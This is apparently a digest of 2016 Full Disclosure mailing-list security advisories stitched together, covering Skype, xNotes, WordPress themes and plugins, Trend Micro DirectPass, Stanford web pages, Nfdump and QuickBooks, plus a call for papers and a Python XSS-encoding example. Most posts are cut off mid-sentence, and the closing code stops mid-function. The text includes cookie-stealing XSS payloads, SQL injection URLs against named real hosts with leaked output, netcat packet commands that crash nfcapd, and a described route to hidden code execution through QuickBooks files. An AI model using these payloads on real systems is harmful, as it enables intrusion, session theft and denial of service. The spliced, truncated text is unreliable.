[FD] Skype Manager - (Email Change) Filter Bypass Vulnerability
Document Title:
===============
Skype Manager - (Email Change) Filter Bypass Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1672

MSRC Case 32353
TRK:0001002845

Release Date:
=============
2016-05-09

Vulnerability Laboratory ID (VL-ID):
====================================
1672

Common Vulnerability Scoring System:
====================================
5.2

Product & Service Introduction:
===============================
Skype is a proprietary voice-over-Internet Protocol service and software application originally created in 2003 by Swedish entrepreneur Niklas Zennström and his Danish partner Janus Friis. It has been owned by Microsoft since 2011. The service allows users to communicate with peers by voice, video, and instant messaging over the Internet. Phone calls may be placed to recipients on the traditional telephone networks. Calls to other users within the Skype service are free of charge, while calls to landline telephones and mobile phones are charged via a debit-based user account system. Skype has also become popular for its additional features, including file transfer, and videoconferencing. Competitors include SIP and H.323-based services, such as Linphone, as well as the Google Talk service, Mumble and Hall.com. Skype has 663 million registered users as of September 2011. The network is operated by Microsoft, which has its Skype division headquarters in Luxembourg. Most of the development team and 44% of the overall employees of the division are situated in Tallinn and Tartu, Estonia. Unlike most other VoIP services, Skype is a hybrid peer-to-peer and client–server system. It makes use of background processing on computers running Skype software. Skype's original proposed name (Sky Peer-to-Peer) reflects this fact. Some network administrators have banned Skype on corporate, government, home, and education networks, citing reasons such as inappropriate usage of resources, excessive bandwidth usage, and security concerns.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype)

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a hidden function to change unauthorized email accounts of the official Skype Manager web-application.

Vulnerability Disclosure Timeline:
==================================
2016-01-19: Researcher Notification & Coordination (Karim Rahal)
2016-01-20: Vendor Notification (MSRC - Skype Security Team)
2016-01-28: Vendor Response/Feedback (MSRC - Skype Security Team)
2016-05-05: Vendor Fix/Patch (Microsoft Skype Developer Team)
2016-05-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Microsoft Corporation
Product: Skype Manager - Online Service (Web-Application) 2016 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A filter bypass vulnerability has been discovered in the official Microsoft Skype Manager online service web-application. The vulnerability allows bypassing a securely set filter restriction of the web-application that is meant to deny unauthorized interaction by criminals in account take-over attacks.

Filter bypass is a vulnerability which performs evasion on a certain filter and bypasses it. In this case it was possible to bypass the filter which didn't allow a user/attacker to change his email without entering his password, etc. With this filter bypass you can simply change your email just by being inside the account; you don't even have to know the account's password.

This filter bypass is possible because there isn't enough validation/checking inside the API, which didn't check if it is his actual email or if he can actually change it. In addition, this vulnerability easily allowed full account takeover once exploited: a hacker would hack into an account through a session but wouldn't have full access because he doesn't have the password, but this filter bypass allowed him to change password, then send a change password link to the changed email, which is his hacking email, and then he resets the password and tadaa! He now has full access to the account.

The security risk of the filter bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.2.

Exploitation of the filter and validation web vulnerability requires a low privileged skype user account with restricted access and low user interaction. Successful exploitation of the vulnerability results in an account take-over in one malicious interaction.

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with a low privileged skype web-application user account and low user interaction. For security demonstration or to reprod
[FD] Notes v4.5 iOS - Arbitrary File Upload Vulnerability
Document Title:
===============
Notes v4.5 iOS - Arbitrary File Upload Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1832

Release Date:
=============
2016-04-25

Vulnerability Laboratory ID (VL-ID):
====================================
1832

Common Vulnerability Scoring System:
====================================
6.4

Product & Service Introduction:
===============================
xNotes, My Personal Documents, Diary.

(Copy of the Homepage: http://appshopper.com/utilities/x-notes-my-personal-documents )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an arbitrary file upload vulnerability in the official Notes v4.5 iOS mobile web-application (wifi).

Vulnerability Disclosure Timeline:
==================================
2016-04-25: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Shanmin Xu
Product: xNotes - Mobile API (Web-Application) 4.5

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Notes v4.5 iOS mobile web-application (wifi). The local file include web vulnerability allows remote attackers to include unauthorized local file/path requests via POST.

The web vulnerability is located in the `filename` values of the `Upload File` module. Remote attackers are able to inject own files with malicious `filename` values in the `upload.action` POST method request to compromise the mobile web-application. The arbitrary file upload execution occurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file upload form request by usage of the `wifi interface` in connection with the vulnerable upload service module.

The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of the arbitrary file upload vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the arbitrary file upload web vulnerability results in mobile web-application or device compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] File Dir Index Listing

Proof of Concept (PoC):
=======================
The file include web vulnerability can be exploited by remote attackers without privileged user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the vulnerable iOS web-application to your iOS device
2. Start the application
3. Open the file transfer button on the bottom left
4. Open the called IP in a web-browser
5. Surf to the Upload function and choose a random test image/picture
6. Start a http session tamper to exploit the followup POST method request
7. Inject your local file request to the filename value for exploitation
8. Continue the request
9. The local file include issue executes in the filename value in the next step
10. Successful reproduce of the local file include vulnerability!

PoC: Exploitation
http://localhost:51025/./[ARBITRARY FILE UPLOAD VULNERABILITY! PHP]/

--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:51025/
Request Header:
Host[localhost:51025]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:51025/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-60382496219157
Content-Disposition: form-data; name="file"; filename="./[ARBITRARY FILE UPLOAD VULNERABILITY! PHP]/"

Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the iOS web-application is estimated as high. (CVSS 6.4)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) [www.vulnerability-lab.com] [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and c
[FD] Wordpress Truemag Theme - Client Side Cross Site Scripting Web Vulnerability
Document Title:
===============
Wordpress Truemag Theme - Client Side Cross Site Scripting Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1839

Release Date:
=============
2016-04-29

Vulnerability Laboratory ID (VL-ID):
====================================
1839

Common Vulnerability Scoring System:
====================================
3.3

Product & Service Introduction:
===============================
CactusThemes is an experienced and passionate web design team with over 8 years working together designing and developing themes and plugins. Our goal is to create the best WordPress themes for education, event, news, etc. and meet all your needs.

(Copy of the Homepage: http://www.cactusthemes.com/#themes )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side cross site scripting vulnerability in the official Wordpress Truemag Theme.

Vulnerability Disclosure Timeline:
==================================
2016-04-29: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
CactusThemes
Product: Truemag Theme (Wordpress) - Theme (Web-Application) 2016 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Wordpress Truemag Theme web-application. The non-persistent vulnerability allows remote attackers to inject own malicious script code into the client-side application via browser requests.

The client-side cross site vulnerability is located in the `s` value of the page module GET method request. Remote attackers are able to inject own malicious script codes into the client-side of the online service web-application to compromise user session information or data. The request method to execute is GET and the attack vector is non-persistent.

The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the non-persistent web vulnerability requires no privileged web application user account and low user interaction (click link). Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicious script codes or non-persistent web module context manipulation.

Request Method(s):
[+] GET

Vulnerable Service(s):
[+] Truemag Theme (Wordpress)

Vulnerable Module(s):
[+] /wp-contact/theme/truemag

Vulnerable Parameter(s):
[+] s

Proof of Concept (PoC):
=======================
The remote cross site vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Dork(s):
inurl: /wp-contact/theme/truemag

PoC: Payload
">%20alert(document.cookie)

PoC: Example
http://wp.localhost:8080/?s=[CLIENT SIDE CROSS SITE SCRIPTING VULNERABILITY!]

PoC: Exploitation
http://wp.localhost:8080/?s=";>%20alert(document.cookie)

Reference(s):
http://wp.localhost:8080/?s=

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable `s` value in the webpage GET method request. Encode the parameter and restrict the value input to prevent further script code injection attacks.

Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the vulnerable `s` value is estimated as medium. (CVSS 3.3)

Credits & Authors:
==================
Iran Cyber Security Group - 0x3a (ICG SEC) [Iran-Cyber.Net] [http://www.vulnerability-lab.com/show.php?user=Iran%20Cyber%20Security]

Special Thanks: root3r

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, polic
[FD] Trend Micro Direct Pass - Filter Bypass & Cross Site Scripting Vulnerability
Document Title:
===============
Trend Micro Direct Pass - Filter Bypass & Cross Site Scripting Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1716

Trend Micro Security ID: 1-1-1039900197

Release Date:
=============
2016-05-01

Vulnerability Laboratory ID (VL-ID):
====================================
1716

Common Vulnerability Scoring System:
====================================
4.3

Product & Service Introduction:
===============================
DirectPass runs as a local console and browser plug-in but can also sync between multiple PC installations through your Trend Micro account. Unlike LastPass 1.72 (free, 5 stars), Dashlane (free, 4.5 stars), and RoboForm Everywhere 7 ($19.95 direct, 4.5 stars), it doesn't let you log in to your saved credentials online. However, it will sync with free DirectPass apps for Android and iPhone. You can also test a free edition that manages just five passwords. DirectPass can export its data for import to another DirectPass installation. It can also import login data from LastPass. Hoping to get a fast start, I imported my 200+ LastPass logins. The results were disappointing. For starters, DirectPass doesn't include the ability to categorize sites, so my passwords came through as an unordered list, a very long list. There's no way to sort the list, and no provision to search for a particular login. For some reason, clicking in the list's scroll bar doesn't scroll down by one "page" of items. Instead, it scrolls to the corresponding location in the list. Finding any particular login required tediously scrolling through the entire list.

(Copy of the Vendor Homepage: https://www.directpass.com/signin )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a filter bypass issue and cross site vulnerability in the official Trend Micro Direct Pass web-application.

Vulnerability Disclosure Timeline:
==================================
2016-02-08: Researcher Notification & Coordination (Karim Rahal)
2016-02-09: Vendor Notification (Trend Micro Security Team)
2016-02-10: Vendor Response/Feedback (Trend Micro Security Team)
2016-04-27: Vendor Fix/Patch (Trend Micro Developer Team)
2016-05-01: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Trend Micro
Product: DirectPass 2016 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A filter bypass and cross site scripting vulnerability has been discovered in the official Trend Micro DirectPass online service web-application. The vulnerability allows remote attackers to bypass the filter restrictions of the web-application validation procedure mechanism. The cross site vulnerability allows an attacker to inject own malicious script codes on the application-side of the vulnerable module's context.

There is a filter which filters special characters in the website, but it was bypassed through filter-evasion by a live session tamper for http. The mechanism does approve the direct input but does not filter the request context itself. This allows an attacker to bypass the basic special char filter. The cross site issue is inside the `(title) has been deleted` message once you delete a listed password; replacing (title) with an xss payload would execute the cross site scripting payload.

Proof of Concept (PoC):
=======================
The filter bypass and cross site vulnerability can be exploited by remote attackers with a low privileged web-application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Go to pwm.trendmicro.com
2. Make sure you have the Trend Micro Password Manager (Direct Pass) extension installed
3. Go to add a new password
4. Open a proxy interpreting tool (livehttpheaders / tamper data / burpsuite)
5. Insert a title and the rest of the information while interpreting/tampering the requests
6. Then edit the POST request which is sent to localhost:49154 and has the information of the new password
7. Now edit "DisplayName":"(your title)" to "DisplayName":"'>" (this will alert "XSS")
8. Then edit "ID":"(id)" and add anything to it like "ID":"anything(id)"
9. Now replay the request
10. Go back to pwm.trendmicro.com
11. Check your passwords and you will see that you were able to put invalid characters into the title! [Filter Bypass=done]
12. Now delete the password
13. The xss will alert with the cookie! [XSS=done]
14. Successful reproduce of the vulnerability!

PoC: Video
https://www.youtube.com/watch?v=cgN2c4bZniY

Security Risk:
==============
The security risk of the filter bypass issue and cross
[FD] Stanford University - Multiple SQL Injection Vulnerabilities
Document Title:
===============
Stanford University - Multiple SQL Injection Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1829

Release Date:
=============
2016-05-09

Vulnerability Laboratory ID (VL-ID):
====================================
1829

Common Vulnerability Scoring System:
====================================
7.8

Product & Service Introduction:
===============================
Stanford University, located between San Francisco and San Jose in the heart of California's Silicon Valley, is one of the world's leading teaching and research universities. Since its opening in 1891, Stanford has been dedicated to finding solutions to big challenges and to preparing students for leadership in a complex world.

(Copy of the Homepage: http://www.stanford.com/about/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection vulnerabilities in the official Stanford University online service web-application.

Vulnerability Disclosure Timeline:
==================================
2016-04-19: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-04-20: Vendor Notification (Campus Security Department)
2016-04-22: Vendor Response/Feedback (Campus Security Department)
2016-05-06: Vendor Fix/Patch (Stanford Site Developer Team)
2016-05-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Stanford
Product: Stanford University - Online Service (Web-Application) 2016 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A remote sql-injection web vulnerability has been discovered in the official Stanford University online service web-application. The vulnerability allows remote attackers and privileged user accounts to execute own sql commands to compromise the web-server or dbms.

The vulnerability is located in the `id` value of the `getevent.php` file GET method request. Remote attackers are able to execute own malicious sql commands via the id value to compromise the web-server or connected database management system. The issue is a classic remote sql injection vulnerability. The request method to execute is GET and the attack vector is located on the application-side of the active web-service.

The security risk of the sql-injection vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 7.8. Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] getevent.php

Vulnerable Parameter(s):
[+] id

Proof of Concept (PoC):
=======================
The sql-injection vulnerability can be exploited by remote attackers without privileged user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Example
http://[URL]/[PATH]/[Module]/[CGI-BIN]/[PAGE]?[ID]=[SQL-INJECTION!]

PoC: Exploitation
http://www.stanford.com/dept/asianlang/cgi-bin/about/getevent.php?id=1%20union%20select%201,user%28%29,3,4,5,version%28%29,7,8
http://www.stanford.com/dept/asianlang/cgi-bin/about/getevent.php?id=1%20union%20select%201,user%28%29,3,4,5,version%28%29,7,8
http://ealc.stanford.edu/about/getevent.php?id=1%20union%20select%201,user%28%29,3,4,5,version%28%29,7,8
http://ceas.stanford.edu/oldSite/events/getevent.php?id=-1%20union%20select%201,user%28%29,3,4,5,version%28%29,7,8

PoC: Output Exploitation
November 30, 2002 / 5.5.47-0+deb7u1-log dasianlangde...@www02.stanford.edu 4: am— 5: am 7 8

Reference(s):
http://www.stanford.com/
http://www.stanford.com/dept/
http://www.stanford.com/dept/asianlang/
http://www.stanford.com/dept/asianlang/cgi-bin/
http://www.stanford.com/dept/asianlang/cgi-bin/about/
http://ceas.stanford.edu/oldSite/events/
http://ealc.stanford.edu/about/

Security Risk:
==============
The security risk of the sql-injection vulnerabilities in the stanford online service web-application is estimated as medium. (CVSS 7.8)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) [www.vulnerability-lab.com] [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is wit
[FD] Nfdump Nfcapd 1.6.14 Multiple Vulnerabilities
Security-Assessment.com presents..

Nfdump Nfcapd Multiple Vulnerabilities

Affected Versions: Nfdump <= 1.6.14

PDF: http://www.security-assessment.com/files/documents/advisory/Nfdump%20nfcapd%201.6.14%20-%20Multiple%20Vulnerabilities.pdf

+-------------+
| Description |
+-------------+

This document details multiple vulnerabilities found within the nfcapd netflow collector daemon. An unauthenticated attacker may leverage these vulnerabilities to trigger a denial of service condition within the nfcapd daemon. Two read-based heap overflow vulnerabilities were found within the IPFIX processing code and one logic-based denial of service was found in the Netflow V9 processing code.

+--------------+
| Exploitation |
+--------------+

== Process_ipfix_template_add heap overflow ==

By tampering with the flowset_length parameter within an IPFIX packet, an attacker can trigger a denial of service condition within nfcapd. Line 931 in file ipfix.c decrements the size_left value by 4, and by triggering a condition where the initial value is less than 4, e.g. 1 as in the below POC, an integer underflow occurs. This wraps the size_left value (indicating the remaining packet payload to be processed) to 4294967293, resulting in nfcapd continuously processing the heap-based buffer allocated for the input packet (allocated at line 381 of nfcapd.c) until it eventually hits invalid memory and crashes with a segmentation fault.

--[ Process_ipfix_template_add heap overflow POC
echo "AAoABQACAAUBAA==" | base64 -d | nc -u 127.0.0.1

== Process_ipfix_option_templates heap overflow ==

By submitting an IPFIX packet with a flowset id of 3 and a large scope_field_count parameter (65535 in the below POC), nfcapd will continuously process the heap-based buffer allocated for the packet, eventually hitting an invalid memory address and crashing with a segmentation fault. The scope_field_count is taken directly from the packet (line 1108, ipfix.c) and is subsequently used in the for loop processing the packet contents (line 1138, ipfix.c).

--[ Process_ipfix_option_templates heap overflow POC
echo "AAoAAQADAAoA/wAA//8=" | base64 -d | nc -u 127.0.0.1

== Process_v9_data infinite loop ==

By sending a crafted packet, an attacker can cause the nfcapd daemon to enter an infinite loop. As well as consuming a considerable amount of processing power, this infinite loop will eventually exhaust all available disk space. Once disk space is exhausted, the nfcapd daemon will exit. The infinite loop is triggered due to the table->input_record_size variable being set to zero. As the Process_v9_data method processes the packet, table->input_record_size is subtracted from the size_left variable, with the intention being that once size_left is zero the processing is concluded. As size_left is being decremented by zero each loop, this while loop (line 1529, netflow_v9.c) runs infinitely.

--[ Process_v9_data infinite loop POC
echo "AAkUBAQAAAYA/w==" | base64 -d | nc -u 127.0.0.1

Further information is available in the PDF version of this advisory.

+----------+
| Solution |
+----------+

Upgrade to the latest Nfdump codebase (commit 6ef51a7405797289278b36a9a7deabb3cb64d80c or later)

+----------+
| Timeline |
+----------+

12/03/2016 - Advisory sent to Peter Haag
19/03/2016 - Advisory acknowledged
07/05/2016 - Additional information requested
07/05/2016 - Updated version released on GitHub
10/05/2016 - Advisory release

+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+

Security-Assessment.com is a leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendors' products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings, contact us:
Web
[FD] Intuit QuickBooks 2007 - 2016 Arbitrary Code Execution
+ Credits: Maxim Tomashevich from Thegrideon Software
+ Website: https://www.thegrideon.com/
+ Details: https://www.thegrideon.com/qb-internals-sql.html

Vendor:
-------
www.intuit.com, www.intuit.ca, www.intuit.co.uk

Product:
--------
QuickBooks Desktop versions: 2007 - 2016

Vulnerability Type:
-------------------
Arbitrary SQL / Code Execution

Vulnerability Details:
----------------------
QuickBooks company files are SQL Anywhere database files, and other QB formats are based on SQL Anywhere features as well. SQL code (Watcom SQL) is an important part of the QB workflow; it is arguably more powerful than VBA in MS Access or Excel, and at the same time it is completely hidden and starts automatically with every opened file! Functions like xp_write_file and xp_cmdshell are included by default, allowing "rootkit" installation in just 3 lines of code: get data from table -> xp_write_file -> xp_cmdshell. A procedure in one database can be used to insert code into another directly or using the current user credential. Moreover, the real database content is hidden from QuickBooks users, so there is virtually unlimited storage for code, stolen data, etc.

QBX (accountant's transfer copies) and QBM (portable company files) are even easier to modify but are supposed to be sent to an outside accountant for processing during the normal workflow. QBX and QBM are compressed SQL dumps, so SQL modification is as hard as replacing the zlib compressed "reload.sql" file inside the compound file!

In all cases QuickBooks does not attempt (and has no way) to verify SQL scripts and starts them automatically with "DBA" privileges, thus it should be obvious that all outside files (qbw, qba, qbx, qbm) should be considered extremely dangerous. SQL Anywhere is built for embedded applications, so there are a number of tricks and functions (like the SET HIDDEN clause) to protect SQL code from analysis, making this a severe QuickBooks design flaw.

Proof of Concept:
-----------------
Below you can find a company file created in QB 2009 and modified to start "Notepad.exe" upon every user login (Admin, no pass). This example will work in any version including 2016 (US, CA, UK) - login procedure execution is required in order to check the QB version or edition or to start an update, so you will see Notepad before the QB "wrong version" error message.

https://www.thegrideon.com/qbint/QBFp.zip

Disclosure Timeline:
--------------------
Contacted Vendor: 2016-03-21
Contacted PCI Security Consul: 2016-04-15
PCI Security Consul: 2016-04-19 "we are looking into this matter", but no details requested.
PoC sent to Vendor: 2016-04-26
[unexpected and strange day by day activity from Intuit India employees on our website without any attempts to communicate -> public disclosure.]
Public Disclosure: 2016-05-10

Severity Level:
---------------
High

Disclaimer:
-----------
Permission is hereby granted for the redistribution of this text, provided that it is not altered except by reformatting, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CFP: Passwords 2016, Ruhr-University Bochum, Germany, Dec 5-7
Call for Papers The 11th International Conference on Passwords PASSWORDS 2016 5-7 December 2016 Ruhr-University Bochum, Germany https://passwords2016.rub.de/ The Passwords conference was launched in 2010 as a response to the lack of robustness and usability of current personal authentication practices and solutions. Annual participation has doubled over the past three years. Since 2014, the conference accepts peer-reviewed papers. * IMPORTANT DATES * Research papers and short papers: - Title and abstract submission: 2016-07-04 (23:59 UTC-11) - Paper submission: 2016-07-11 (23:59 UTC-11) - Notification of acceptance: 2016-09-05 - Camera-ready from authors: 2016-09-19 Hacker Talks: - Talk proposal submission: 2016-09-15 (23:59 UTC-11) - Notification of acceptance: 2016-09-30 * CONFERENCE AIM * More than half a billion user passwords have been compromised over the last five years, including breaches at internet companies such as Target, Adobe, Heartland, Forbes, LinkedIn, Yahoo, and LivingSocial. Yet passwords, PIN codes, and similar remain the most prevalent method of personal authentication. Clearly, we have a systemic problem. This conference gathers researchers, password crackers, and enthusiastic experts from around the globe, aiming to better understand the challenges surrounding the methods personal authentication and passwords, and how to adequately solve these problems. The Passwords conference series seek to provide a friendly environment for participants with plenty opportunity to communicate with the speakers before, during, and after their presentations. * SCOPE * We seek original contributions that present attacks, analyses, designs, applications, protocols, systems, practical experiences, and theory. 
Submitted papers may include, but are not limited to, the following topics, all related to passwords and authentication:

- Technical challenges and issues:
  - Cryptanalytic attacks
  - Formal attack models
  - Cryptographic protocols
  - Dictionary attacks
  - Digital forensics
  - Online attacks/Rate-limiting
  - Side-channel attacks
- Administrative challenges:
  - Account lifecycle management
  - User identification
  - Password resets
  - Cross-domain and multi-enterprise system access
  - Hardware token administration
- Password "replacements":
  - 2FA and multifactor authentication
  - Risk-based authentication
  - Password managers
  - Costs and economy
  - Biometrics
  - Continuous authentication
  - FIDO
  - U2F
- Deployed systems:
  - Best practice reports
  - Incident reports/Lessons learned
- Human factors:
  - Usability
  - Design & UX
  - Social Engineering
  - Memorability
  - Accessibility
  - Pattern predictability
  - Gestures and graphical patterns
  - Psychology
  - Statistics (languages, age, demographics...)
  - Ethics

* INSTRUCTIONS FOR AUTHORS *

Papers must be submitted as PDF using the Springer LNCS format for LaTeX. Abstract and title must be submitted one week ahead of the paper deadline.

We seek submissions for review in the following three categories:
- Research Papers
- Short Papers
- "Hacker Talks" (talks without academic papers attached)

RESEARCH PAPERS should describe novel, previously unpublished technical contributions within the scope of the call. The papers will be subjected to double-blind peer review by the program committee. Paper length is limited to 16 pages (LNCS format) excluding references and well-marked appendices. The paper submitted for review must be anonymous, hence author names, affiliations, acknowledgements, or obvious references must be temporarily edited out for the review process. The program committee may reject non-anonymized papers without reading them. The submitted paper (in PDF format) must follow the template described by Springer at http://www.springer.de/comp/lncs/authors.html.

SHORT PAPERS will also be subject to peer review, where the emphasis will be put on work in progress, hacker achievements, industrial experiences, and incidents explained, aiming at novelty and promising directions. Short paper submissions should not be more than 6 pages in standard LNCS format in total. A short paper must be labeled by the subtitle "Short Paper". Accepted short paper submissions may be included in the conference proceedings. Short papers do not need to be anonymous. The program committee may accept full research papers as short papers.

HACKER TALKS are presentations without an academic paper attached. They will typically explain new methods, techniques, tools, systems, or services within the Passwords scope. Proposals for Hacker Talks can be submitted by anybody ("hackers", academics, students, enthusiasts, etc.) in any format, but typically will include a brief (2-3 paragraphs) description of the talk's content and the person presenting. They will be evaluated by a separate subcommittee led by Per Thorsheim, according to different criteria than t
[FD] BulletProof Security 53.3 - Security Advisory - Multiple XSS Vulnerabilities
Information

Advisory by Netsparker
Name: Multiple XSS Vulnerabilities in BulletProof Security
Affected Software: BulletProof Security
Affected Versions: v53.3 and possibly below
Vendor Homepage: https://wordpress.org/plugins/bulletproof-security/
Vulnerability Type: Cross-site Scripting
Severity: Important
Status: Fixed
Netsparker Advisory Reference: NS-16-004

Technical Details

Proof of Concept URLs for XSS vulnerabilities in BulletProof Security v53.3:

URL: /wordpress/wp-admin/admin.php?page=bulletproof-security/admin/security-log/security-log.php
Parameter Name: user-agent-ignore
Parameter Type: POST
Attack Pattern: '"-->alert(0x001E32)

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
15 Mar 2016 - First Contact
23 Mar 2016 - Vendor Fixed
09 May 2016 - Advisory Released

Solution
Update the plugin.

Credits & Authors
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.

About Netsparker
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.

Onur Yılmaz - National General Manager
Netsparker Web Application Security Scanner
T: +90 (0)554 873 0482
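The bug class behind the advisory above, as an added example (not code from the advisory, from Netsparker, or from the BulletProof Security plugin): a Python model of a POST parameter echoed into an HTML attribute without output encoding, beside the hardened form. The rendering context (an <input value="..."> on the security log page) is an assumption, since the advisory names only the parameter and the probe string; the probe string itself is the one quoted above and is used purely as test input. Python's html.parser stands in for the browser to show that, unencoded, the quote in the probe closes the attribute and the rest of the string lands outside the tag, while with attribute-context encoding the whole string survives as the attribute value and nothing escapes. In WordPress itself the equivalent fix is esc_attr() (or esc_html() for text context) on every value that is written back into the page.

```python
"""Model of a reflected-XSS defect: an untrusted POST parameter written
into an HTML attribute with and without context-appropriate encoding.

Added example; not the advisory's, Netsparker's, or the plugin's code.
The <input value="..."> rendering context is an assumption.
"""
import html
from html.parser import HTMLParser

# Probe string quoted in the advisory; used here purely as test input.
PROBE = '\'"-->alert(0x001E32)'


def render_unsafe(user_agent_ignore: str) -> str:
    """Echo the parameter into an attribute with no output encoding (the defect)."""
    return ('<input type="text" name="user-agent-ignore" '
            f'value="{user_agent_ignore}">')


def render_safe(user_agent_ignore: str) -> str:
    """Same markup with attribute-context encoding: quotes, <, > and & become
    entities, so the value can never close the attribute or the tag.
    (In WordPress the equivalent call is esc_attr().)"""
    return ('<input type="text" name="user-agent-ignore" '
            f'value="{html.escape(user_agent_ignore, quote=True)}">')


class _TagInspector(HTMLParser):
    """Record what a parser sees: the value attribute, any unexpected
    attribute names created by a break-out, and text that ended up
    outside the tag."""

    def __init__(self) -> None:
        super().__init__()
        self.value = None
        self.stray_attrs = []
        self.leaked_text = ""

    def handle_starttag(self, tag, attrs):
        for name, val in attrs:
            if name == "value":
                self.value = val
            elif name not in ("type", "name"):
                self.stray_attrs.append(name)

    def handle_data(self, data):
        self.leaked_text += data


def inspect(markup: str):
    """Return (value attribute, stray attribute names, text leaked outside the tag)."""
    p = _TagInspector()
    p.feed(markup)
    p.close()
    return p.value, p.stray_attrs, p.leaked_text


def is_contained(markup: str, expected: str) -> bool:
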